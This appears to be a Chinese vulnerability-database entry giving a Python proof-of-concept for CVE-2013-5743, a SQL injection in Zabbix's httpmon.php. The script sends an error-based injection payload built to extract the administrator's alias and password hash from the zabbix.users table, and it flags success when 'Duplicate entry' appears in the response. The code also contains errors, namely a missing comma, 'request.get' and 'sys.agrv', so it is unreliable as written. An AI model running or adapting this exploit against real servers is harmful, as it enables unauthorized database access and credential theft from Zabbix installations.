欢迎致电:4000-600-654服务时间:9:00 - 21:00

Zabbix httpmon.php注入漏洞

漏洞信息

漏洞编号:JDSEC-POC-20141201-4654

漏洞名称:Zabbix httpmon.php注入漏洞

提交作者:nx4dm1n

提交日期:2014-12-01 13:20:25

信息来源:http://www.nxadmin.com/penetration/1215.html

漏洞描述

CVE-2013-5743

POC详情

#!/usr/bin/env python
#coding=utf-8

import sys
import requests

def scan(target):
    info={
        'name':u'Zabbix httpmon.php注入漏洞',
        'date':'2014-11-30',
        'author':'nx4dm1n'
        'poc':'/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29'
        }
    headers={
        'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
    audit_request=request.get(target+info['poc'],headers=headers)
    audit_request.close()
    if audit_request.status_code==200:
        if audit_request.text.find('Duplicate entry')!=-1:
            print u'[!]audit success'
            print '[*]'+target+info['poc']
        else:
            print u'[!]audit error'
    else:
        print 'connection error'

if __name__=='__main__':

    if len(sys.argv)<2:
        print "Usage: python Zabbix_httpmon_php_sqli.py [target]\n"
        print "Example: python Zabbix_httpmon_php_sqli.py http://www.jdsec.com"
        sys.exit(1)
    else:
        target=sys.agrv[1].lower()
    scan(target)